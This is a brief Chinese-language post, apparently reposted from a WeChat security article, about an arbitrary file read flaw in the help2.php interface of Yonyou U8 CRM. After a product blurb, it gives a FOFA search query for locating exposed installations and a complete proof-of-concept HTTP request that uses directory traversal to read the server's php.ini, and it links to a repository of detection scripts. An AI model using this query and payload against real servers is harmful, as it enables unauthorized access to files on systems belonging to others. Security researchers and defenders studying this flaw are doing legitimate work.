用友U8+经过20多年的市场锤炼,不断贴近客户需求,以全新UAP为平台,应对中型及成长型企业客户群的发展,提供的是一整套企业级数智化升级解决方案,为成长型企业构建精细管理、产业链协同、社交化运营为一体的企业互联网经营管理平台,助力企业应势而变。g该系统help2文件中接口存在任意文件读取漏洞,
fofa查询
title="用友U8CRM"POC
GET /pub/help2.php?key=/../../apache/php.ini HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateDNT: 1Connection: closeUpgrade-Insecure-Requests: 1
pocsuite3漏洞检测
漏洞检测脚本已上传免费漏洞库
地址:
https://github.com/Vme18000yuan/FreePOC
文章来源: http://mp.weixin.qq.com/s?__biz=MzIxMTg1ODAwNw==&mid=2247498766&idx=1&sn=6140b9e884b927fb06ed10e4b08783ed&chksm=9675640b73672a41e150de9a8a1a7429eed950907719306b6a83e9c8fa4f011e4dc5d9d535bc&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh